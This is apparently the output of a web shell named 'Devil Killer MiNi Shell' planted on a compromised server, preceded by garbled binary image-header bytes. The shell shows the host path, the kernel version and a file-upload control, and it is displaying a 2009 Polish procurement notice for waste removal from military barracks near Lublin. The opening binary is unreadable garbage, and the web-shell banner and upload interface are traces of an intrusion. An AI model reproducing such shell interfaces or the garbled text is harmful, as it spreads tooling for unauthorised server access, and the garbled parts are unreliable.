JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/175854-N-2009.html

<p class="kh_header"><b>Lublin: Wywóz stałych odpadów komunalnych wraz z umożliwieniem ich segregacji (zbiórki surowców wtórnych) z obiektów jednostek wojskowych zlokalizowanych w części rejonu działania RZI Lublin</b><br>
<b>Numer ogłoszenia: 175854 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury Lublin , ul. Lipowa 1a, 20-020 Lublin, woj. lubelskie, tel. 081 7183530, faks 081 7183501.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzi.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz stałych odpadów komunalnych wraz z umożliwieniem ich segregacji (zbiórki surowców wtórnych) z obiektów jednostek wojskowych zlokalizowanych w części rejonu działania RZI Lublin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie wywozu stałych odpadów komunalnych wraz z umożliwieniem ich segregacji (zbiórki surowców wtórnych)  z obiektów jednostek wojskowych zlokalizowanych w części rejonu działania RZI Lublin. Przedmiot zamówienia podzielony jest na 17 zadań wyszczególnionych poniżej w tym  w tym 44 punkty odbioru - ze względu na miejsca wykonywania usług. Wywóz odpadów komunalnych w ciągu roku przewiduje się w ilościach przedstawionych poniżej dla każdego zadania:

- Zadanie nr 1:   rejon Wojskowej Administracji Koszar  Chełm, 4 punkt odbioru, (szac. ilość odpadów: 480 m3)
- Zadanie nr 2:   rejon Wojskowej Administracji Koszar  Hrubieszów, 1 punkt odbioru, (szac. ilość odpadów: 540 m3)
- Zadanie nr 3:   rejon Wojskowej Administracji Koszar  Jarosław, 4 punkty odbioru, (szac. ilość odpadów: 550 m3)
- Zadanie nr 4:   rejon Wojskowej Administracji Koszar  Jawidz,  1 punkt odbioru, (szac. ilość odpadów: 90 m3)
- Zadanie nr 5:   rejon Wojskowej Administracji Koszar  Jawidz, 1 punkt odbioru,(szac. ilość odpadów: 80 m3)
- Zadanie nr 6:   rejon Wojskowej Administracji Koszar  Jawidz, 2 punkty odbioru,(szac. ilość odpadów: 110 m3)
- Zadanie nr 7:   rejon Wojskowej Administracji Koszar  Jawidz, 3 punkty odbioru, (szac. ilość odpadów: 180 m3)
- Zadanie nr 8:   rejon Wojskowej Administracji Koszar  Nowa Dęba, 4 punkty odbioru, (szac. ilość odpadów: 1900 m3)
- Zadanie nr 9:   rejon Wojskowej Administracji Koszar  Nowa Dęba, 1 punkt odbioru, (szac. ilość odpadów: 150 m3)
- Zadanie nr 10: rejon Wojskowej Administracji Koszar  Nowa Dęba, 1 punkt odbioru, (szac. ilość odpadów: 30 m3)
- Zadanie nr 11: rejon Wojskowej Administracji Koszar  Rzeszów, 1 punkt odbioru, (szac. ilość odpadów: 60 m3)
- Zadanie nr 12: rejon Wojskowej Administracji Koszar  Rzeszów,  1 punkt odbioru, (szac. ilość odpadów w : 15 m3)
- Zadanie nr 13: rejon Wojskowej Administracji Koszar  Rzeszów, 1 punkt odbioru, (szac. ilość odpadów: 9 m3)
- Zadanie nr 14: rejon Wojskowej Administracji Koszar  Rzeszów, 2 punkty odbioru, (szac. ilość odpadów: 490 m3)
- Zadanie nr 15: rejon Wojskowej Administracji Koszar  Rzeszów, 9 punktów odbioru, (szac. ilość odpadów: 2250 m3)
- Zadanie nr 16: rejon Wojskowej Administracji Koszar  Stawy, 2 punkty odbioru, (szac. ilość odpadów: 540 m3)
- Zadanie nr 17: rejon Wojskowej Administracji Koszar  Żurawica, 6 punktów odbioru, (szac. ilość odpadów: 2460 m3)
(Adresy punktów odbioru podane są w tabelach w szczegółowym opisie przedmiotu zamówienia)

Szczegółowy opis przedmiotu zamówienia - zawiera załącznik nr 1 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium DLA KAŻDEGO ZADANIA przedmiotu zamówienia o niżej wymienionej wartości:

Zadanie nr 1:		250,00 zł   (słownie: dwieście pięćdziesiąt  złotych)
Zadanie nr 2:		150,00 zł   (słownie: sto pięćdziesiąt  złotych)
Zadanie nr 3:		300,00 zł   (słownie: trzysta  złotych)
Zadanie nr 4:		100,00 zł   (słownie: sto  złotych)
Zadanie nr 5:		100,00 zł   (słownie: sto  złotych)
Zadanie nr 6:		150,00 zł   (słownie: sto pięćdziesiąt  złotych)
Zadanie nr 7:		100,00 zł   (słownie: sto  złotych)
Zadanie nr 8:	         1 200,00 zł   (słownie: jeden tysiąc dwieście  złotych)
Zadanie nr 9:		100,00 zł   (słownie: sto 00/100 złotych)
Zadanie nr 10:		  50,00 zł   (słownie: pięćdziesiąt  złotych)
Zadanie nr 11:		  50,00 zł   (słownie: pięćdziesiąt  złotych)
Zadanie nr 12:		  20,00 zł   (słownie: dwadzieścia  złotych)
Zadanie nr 13:		  20,00 zł   (słownie: dwadzieścia  złotych)
Zadanie nr 14:		450,00 zł   (słownie: czterysta pięćdziesiąt  złotych)
Zadanie nr 15:		800,00 zł   (słownie: osiemset  złotych)
Zadanie nr 16:		200,00 zł   (słownie: dwieście  złotych)
Zadanie nr 17:	         1 400,00 zł   (słownie: jeden tysiąc czterysta  złotych)

   
2.	Wadium może być wniesione w jednej lub w kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3.	Wadium w formie pieniężnej należy wpłacić  przelewem na rachunek bankowy Rejonowego Zarządu Infrastruktury Lublin, 20-020 Lublin, ul. Lipowa 1a, konto nr: 92 1010 1339 0043 0113 9120 0000
Wadium  musi  być  wniesione  najpóźniej do godz. 13:00  dnia 10.06.2009 r.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w wyżej wymienionym terminie znajdzie się na rachunku bankowym Rejonowego Zarządu Infrastruktury Lublin.

4.	Wadium w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty o których mowa w ustawie o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w pok. nr 117, w siedzibie Rejonowego Zarządu Infrastruktury Lublin, 20-020 Lublin, ul. Lipowa 1a, najpóźniej do godz. 13:00  dnia 10.06.2009 r.
 
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną  pieczątką lub czytelny (z podaniem imienia i nazwiska).

Z treści gwarancji winno wynikać bezwarunkowe - na każde pisemne żądanie zgłoszone przez  Rejonowy Zarząd Infrastruktury Lublin, 20-020 Lublin, ul. Lipowa 1a, w terminie związania ofertą - zobowiązanie Gwaranta do wypłaty Rejonowemu Zarządowi Infrastruktury Lublin, 20-020 Lublin, 
ul. Lipowa 1a, pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 oraz w art. 46 ust 4a ustawy Prawo zamówień publicznych.

5.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.

6.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy prawo zamówień publicznych, nie złożył dokumentów o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

7.	Zamawiający zwraca niezwłocznie wadium, jeżeli:
a)	upłynął termin związania ofertą,
b)	zawarto umowę w sprawie zamówienia publicznego,
c)	zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.	

8.	Rejonowy Zarząd Infrastruktury Lublin  niezwłocznie dokona zwrotu wadium na wniosek Wykonawcy:
a)	który wycofał ofertę przed upływem terminu składania ofert,
b)	który został wykluczony z postępowania,
c)	którego oferta została odrzucona.

9.	Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy Wykonawca:
	
a)	odmówił podpisania umowy na warunkach określonych w ofercie,
b)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W  przetargu  mogą  wziąć  udział  wykonawcy  nie  podlegający  wykluczeniu  z  postępowania 
 na  podstawie  art. 24  oraz  spełniający  warunki  określone  art. 22 ust.1 - Prawa  zamówień
 publicznych, tj.;

1)	posiadają  uprawnienia  do  wykonywania  określonej  działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.:
-posiadają zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych zgodnie z ustawą z dn. 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. nr 236 poz. 2008 z 2005r.-tekst jednolity). Nie dotyczy gminnych jednostek organizacyjnych prowadzących przedmiotowa działalność.
-posiadają zezwolenie na zbieranie i transport odpadów komunalnych na podstawie ustawy z dn. 27 kwietnia 2001r. o odpadach (Dz. U. nr 39 poz. 251 z 2007r.tekst jednolity) oraz Rozporządzenia Ministra Środowiska z dn. 27 września 2001r. w sprawie klasyfikacji odpadów ( DZ. U. nr 112 poz. 1206 z 2001r.)
-posiadają zezwolenie  na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów objętych przedmiotem zamówienia wydane przez właściwy organ ewentualnie aktualna umowę z podmiotem prowadzącym działalność w zakresie odzysku lub unieszkodliwiania ww. odpadów ( prowadzącym składowisko odpadów)
-prowadzą działalność gospodarczą w zakresie odpowiadającym przedmiotowi zamówienia zarejestrowaną w Krajowym Rejestrze Sądowym lub wpisaną do ewidencji działalności gospodarczej

2)	posiadają  niezbędną  wiedzę  i  doświadczenie  oraz  dysponują potencjałem technicznym i osobami  zdolnymi  do  wykonania  zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia wykonawcy potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)	znajdują  się  w  sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia,

Ocena spełnienia przez Wykonawców w/w warunków dokonana będzie zgodnie z formułą, spełnia 
- nie spełnia, na podstawie dokumentów i oświadczeń określonych w pkt. XV SIWZ.
Zamawiający wzywa (pod rygorem utraty wadium - zgodnie z art. 46 ust 4a) Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu oraz przez oferowane dostawy wymagań określonych przez Zamawiającego, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli dokumenty zawierające błędy lub wadliwe pełnomocnictwa do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania; oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu wyznaczonym przez zamawiającego jako termin składania ofert. 
Nie spełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> -Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 pkt. 1)- Prawa zamówień publicznych;
-Oświadczenie o spełnianiu warunku określonego w art. 22 ust.1 pkt. 2) i 3) - Prawa zamówień publicznych.
-Oświadczenie  o  nie  podleganiu  wykluczeniu  z  postępowania  o  udzielenie zamówienia    publicznego na podstawie art. 24 ust 1 pkt. 1-9 Prawa zamówień publicznych. 
-Kserokopia zezwolenia na prowadzenie działalności w zakresie odbierania odpadów komunalnych zgodnie z ustawą z dn. 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. nr 236 poz. 2008 z 2005r.). Nie dotyczy gminnych jednostek organizacyjnych prowadzących przedmiotową działalność. -Kserokopia zezwolenia na zbieranie i transport odpadów komunalnych na podstawie ustawy z dn. 27 kwietnia 2001r. o odpadach (Dz. U. nr 39 poz. 251 z 2007r.) oraz Rozporządzenia Ministra Środowiska z dn. 27 września 2001r. w sprawie klasyfikacji odpadów ( DZ. U. nr 112 poz. 1206 z 2001r.). 
-Kserokopia zezwolenia  na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów objętych przedmiotem zamówienia wydane przez właściwy organ ewentualnie aktualna umowę z podmiotem prowadzącym działalność w zakresie odzysku lub unieszkodliwiania ww. odpadów ( prowadzącym składowisko odpadów). 
-Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, potwierdzające, że profil działania Wykonawcy odpowiada przedmiotowi zamówienia oraz zawierający aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy. 
W  przypadku,  gdy  Wykonawcą  są  przedsiębiorcy  prowadzący  działalność  gospodarczą  
w  formie  spółki cywilnej, do oferty  winno  być  załączone  zaświadczenie  o  wpisie  do
ewidencji  działalności  gospodarczej wystawione na  każdego  przedsiębiorcę z osobna.
-Pełnomocnictwo do reprezentacji i zawarcia umowy wystawione przez wszystkich Wykonawców w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia.


Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z  oryginałem  przez  Wykonawcę, na każdej zapisanej stronie dokumentu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rzi.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury Lublin, ul. Lipowa 1a, 20-020 Lublin, pokój nr 117. Opłata za SIWZ wynosi 11,72 PLN.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 13:00, miejsce: Rejonowy Zarząd Infrastruktury Lublin, ul. Lipowa 1a, 20-020 Lublin, pokój nr 103(kancelaria). Oferty nadesłane pocztą również obowiązuje ww. termin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1:   rejon Wojskowej Administracji Koszar  Chełm, 4 punkt odbioru, (szac. ilość odpadów: 480 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Chełm w ilości  480 m3/rok, 4 punkty odbioru.

1.
1.	Miejsce wykonywania usługi		ul. Lubelska 139, 22-100 Chełm
2.	Ilość i rodzaj pojemników na stałe odpady komunalne:	Do podstawienia: 6 pojemników 1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym. 
3.	Szacunkowa ilość odpadów w skali 1 roku	270 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet
2.
1.	Miejsce wykonywania usługi		ul. Lubelska 168, 22-100 Chełm
2.	Ilość i rodzaj pojemników:	Do podstawienia: 3 pojemniki POK 2,2 m3 lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym. 
3.	Szacunkowa ilość odpadów w skali 1 roku	160 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet
3.
1.	Miejsce wykonywania usługi		ul. Koszarowa 16, 22-100 Chełm
2.	Ilość i rodzaj pojemników:	Do podstawienia: 1 pojemnik POK 2,2 m3  lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionemu.
3.	Szacunkowa ilość odpadów w skali 1 roku	4,4 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

4.
1.	Miejsce wykonywania usługi		Srebrzyszcze, 22-100 Chełm
2.	Ilość i rodzaj pojemników:	Do podstawienia: 2 pojemniki POK 2,2 m3 lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym. 
3.	Szacunkowa ilość odpadów w skali 1 roku	45,6 m3
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	1 komplet

W zadaniu nr 1 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi do 3 dni roboczych od daty zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2:   rejon Wojskowej Administracji Koszar  Hrubieszów, 1 punkt odbioru, (szac. ilość odpadów: 540 m3).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 obejmuje wywóz odpadów komunalnych z rejonu Wojskowej Administracji Koszar Hrubieszów w ilości    540 m3/rok, 1 punkt odbioru.


1.
1.	Miejsce wykonywania usługi		ul. Dwernickiego 4, 22-500 Hrubieszów
2.	Ilość i rodzaj pojemników:	Do podstawienia: 10 pojemników  1100L (1,1 m3) lub pojemniki innego rodzaju w ilości odpowiadającej pojemności ww. wymienionym. 
3.	Szacunkowa ilość odpadów w skali 1 roku	540 m3 
4.	Pojemniki na segregowane odpady komunalne (szkło, plastik, papier)	2 komplety

W zadaniu nr 2 wykonawca zobowiązuje się do:
1.	wyposażenia posesji w sprawne pojemniki ze szczelnymi pokrywami, do gromadzenia stałych odpadów komunalnych, pojemniki będą własnością Wykonawcy, 
2.	podstawienia pojemników do segregacji (zbiórki surowców wtórnych), pojemniki będą własnością Wykonawcy, 
3.	pojemniki o których mowa w punkcie 1 i 2 zostaną ustawione w miejscach wskazanych przez użytkownika - przedstawiciela Zamawiającego,
4.	systematycznego usuwania odpadów gromadzonych we wszystkich pojemnikach, zgodnie z przyjętymi w umowie ustaleniami.
5.	usunięcia odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem ustalonego terminu wywozu,
6.	wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji,
7.	utrzymywania podstawionych pojemników w czystości, zgodnie z ustaleniami zawartymi w umowie,
8.	wystawiania pojemników z odpadami oraz ich wstawiania po opróżnieniu
9.	składowania odpadów na wyznaczonym do tego celu składowisku odpadów lub przekazanie do unieszkodliwienia,
10.	udostępniania w razie potrzeby dodatkowych pojemników i opróżniania ich wg cen zgodnych z zawartą umową.
11.	w dniu podpisania umowy przedstawi wykaz pracowników oraz sprzętu, przewidzianych do bezpośredniego wykonania czynności wynikających z zamówienia,
12.	każdorazowe wykonanie usługi odbywać się będzie na zgłoszenie telefoniczne uprawnionego przedstawiciela obsługiwanego kompleksu Zamawiającego - termin wykonania usługi nie później niż 24 godziny od zgłoszenia.

Przewiduje się, że ilość gromadzonych odpadów z  segregacji stanowi ok. 15% wszystkich odpadów komunalnych.

Podane ilości przedmiotu zamówienia są ilościami szacunkowymi. Rozliczane będą faktycznie wywiezione m3 nieczystości..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
